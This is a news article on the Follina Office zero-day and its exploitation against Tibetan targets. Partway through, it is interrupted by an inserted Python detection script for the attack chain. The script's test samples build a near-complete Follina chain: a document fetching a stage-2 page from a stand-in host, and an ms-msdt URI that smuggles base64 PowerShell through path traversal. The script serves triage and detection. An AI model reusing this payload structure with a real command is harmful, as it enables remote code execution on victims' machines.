China-backed hackers exploit Microsoft’s unpatched zero-day vulnerability

China-backed hackers are exploiting an unpatched zero-day vulnerability in Microsoft Office, known as “Follina”, that allows malicious code to be executed remotely on Windows systems.

The high-severity vulnerability, tracked as CVE-2022-30190, is being used in attacks to execute malicious PowerShell commands through the Microsoft Support Diagnostic Tool (MSDT) when a specially crafted Office document is opened or previewed. The flaw affects 41 Microsoft products, including Windows 11 and Office 365. It runs without elevated privileges, bypasses Windows Defender detection, and does not need macros to be enabled in order to execute binaries or scripts.

The zero-day can also bypass Microsoft’s Protected View, the Office feature that warns users about potentially harmful files and documents. Researchers at Huntress warned that converting the document to an RTF file lets attackers skip this warning and trigger the exploit simply by previewing the downloaded file in Windows Explorer, without a single click.
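The chain described above has two observable stages: a document whose relationships point at an external resource that Word fetches automatically, and a fetched page that hands an ms-msdt: URI to the diagnostic tool. The triage script below is an added example for this page, not code from TechCrunch, Microsoft, Proofpoint or Huntress. It checks a .docx package for fetch-on-open external relationships (reporting hyperlinks separately, since those are only followed on click) and then pulls the ms-msdt: URI and any base64-encoded PowerShell out of the second-stage HTML. The sample document, the page, the host example.invalid and the decoded command are all constructed here; the PCWDiagnostic/IT_BrowseForFile parameter shape follows publicly circulated proof-of-concept pages and is an assumption of this example, as is treating attachedTemplate (remote template injection) as a fetch-on-open relationship alongside oleObject.

```python
"""Triage checks for the Follina (CVE-2022-30190) delivery chain.

Added example, not the article's or any vendor's code. Stage 1: the document
holds an External oleObject relationship, so Word fetches the URL on open or
preview. Stage 2: the fetched HTML sends an ms-msdt: URI to MSDT; the
PCWDiagnostic / IT_BrowseForFile parameters smuggle the PowerShell.
All samples below are constructed; parameter names mirror public PoC pages.
"""
import base64
import io
import re
import zipfile
from xml.etree import ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OOXML_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
# Relationship types Word resolves without user interaction. A hyperlink is
# also TargetMode="External" but is only followed on click, so it is listed
# but not flagged. attachedTemplate is included by analogy (assumption).
FETCHED_REL_TYPES = {"oleObject", "attachedTemplate"}
# ms-msdt: URI inside a JS/HTML double-quoted string; \" escapes are allowed.
MSDT_URI = re.compile(r'ms-msdt:(?:\\.|[^"\n<])*', re.IGNORECASE)
# PoC pages splice the base64 blob in as a bare single-quoted literal.
B64_LITERAL = re.compile(r"'([A-Za-z0-9+/]{16,}={0,2})'")


def external_relationships(docx_bytes):
    """(type, target) for every External relationship in any .rels part whose
    target is an http(s) URL."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter("{%s}Relationship" % REL_NS):
                target = rel.get("Target", "")
                if rel.get("TargetMode") == "External" and re.match(r"(?i)https?://", target):
                    found.append((rel.get("Type", "").rsplit("/", 1)[-1], target))
    return found


def follina_candidates(docx_bytes):
    """External relationships that Word fetches on open/preview: the Follina indicator."""
    return [(t, u) for t, u in external_relationships(docx_bytes) if t in FETCHED_REL_TYPES]


def analyse_stage2(html):
    """Extract ms-msdt: URIs from the fetched page, flag the PCWDiagnostic +
    IT_BrowseForFile combination, and recover base64-encoded PowerShell."""
    uris = [m.replace('\\"', '"') for m in MSDT_URI.findall(html)]
    is_follina = any("pcwdiagnostic" in u.lower() and "browseforfile" in u.lower() for u in uris)
    payloads = []
    for uri in uris:
        for blob in B64_LITERAL.findall(uri):
            try:
                text = base64.b64decode(blob, validate=True).decode("utf-8")
            except (ValueError, UnicodeDecodeError):
                continue  # not base64 or not text: leave for manual review
            if text.isprintable():
                payloads.append(text)
    return {"uris": uris, "is_follina": is_follina, "payloads": payloads}


# --- constructed samples (not real attack artifacts) -------------------------
def build_sample_docx():
    """Minimal package: one benign external hyperlink plus the external
    oleObject relationship that makes Word fetch the attacker's page."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="%s">'
        '<Relationship Id="rId1" Type="%shyperlink" Target="https://example.invalid/benign" TargetMode="External"/>'
        '<Relationship Id="rId2" Type="%soleObject" Target="http://example.invalid/stage2.html" TargetMode="External"/>'
        "</Relationships>"
    ) % (REL_NS, OOXML_REL, OOXML_REL)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


SAMPLE_DOCX = build_sample_docx()
SAMPLE_COMMAND = "Start-Process calc.exe"  # harmless stand-in for a real payload
SAMPLE_URI = (
    'ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? '
    "IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression("
    "'[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+"
    "'FromBase64String('+[char]34+'" + base64.b64encode(SAMPLE_COMMAND.encode()).decode() + "'+[char]34+'))'))))"
    'i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe"'
)
SAMPLE_STAGE2 = (
    "<!doctype html><html><body><script>\n"
    'location.href = "' + SAMPLE_URI.replace('"', '\\"') + '";\n'
    "</script></body></html>\n"
)

if __name__ == "__main__":
    print("external relationships:", external_relationships(SAMPLE_DOCX))
    print("fetch-on-open targets :", follina_candidates(SAMPLE_DOCX))
    print("stage 2               :", analyse_stage2(SAMPLE_STAGE2))
```

Run against a real sample, `follina_candidates` is the cheap first filter: a document with an external oleObject or template relationship warrants pulling the target URL (from a sandbox, not the analyst's workstation) and feeding the response to `analyse_stage2`, which surfaces the decoded command for the incident record. The RTF variant Huntress described carries the same external reference inside the RTF object stream rather than an OOXML .rels part, so it needs a separate text search for the URL and is not covered by the zip-based check here.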

Microsoft warned that the vulnerability could allow attackers to install programs, delete data, and create new accounts in the context allowed by the user’s rights.

Security researchers have observed attackers using the vulnerability against Russian and Belarusian users since April, and enterprise security company Proofpoint said this week that a Chinese state-sponsored hacking group is using the zero-day in attacks targeting the international Tibetan community.

“TA413 CN APT detected [in-the-wild] exploiting the Follina zero-day, using URLs to deliver ZIP archives containing Word documents that use this technique,” Proofpoint said in a tweet. “Campaigns impersonate the ‘Women Empowerments Desk’ of the Central Tibetan Administration and use the domain tibet-gov.web[.]app.”

Proofpoint told TechCrunch that it had previously observed the threat actor TA413, also tracked as “LuckyCat” and “Earth Berberoka”, targeting Tibetan organizations with malicious browser extensions and COVID-19-themed espionage campaigns.

Microsoft was first notified of the Follina vulnerability on April 12, after Word documents that masqueraded as the Russian media outlet Sputnik offering recipients a radio interview were found abusing the flaw. However, the Shadow Chaser Group researcher who first reported the zero-day, known as crazyman, said that Microsoft initially dismissed the flaw as not a “security related issue”. The tech giant later told the researcher that “the issue has been fixed”, but no patch appears to be available.

TechCrunch asked Microsoft when a patch would be published, but the company did not respond. Microsoft has, however, released new guidance telling administrators that they can block attacks using CVE-2022-30190 by disabling the MSDT URL protocol handler, and by turning off the preview pane in Windows Explorer so that a crafted file is not rendered merely by being selected.

The US Cybersecurity and Infrastructure Security Agency (CISA) issued an advisory on Tuesday urging users and administrators to review the Microsoft guidance and apply the necessary workarounds.




Credit: techcrunch.com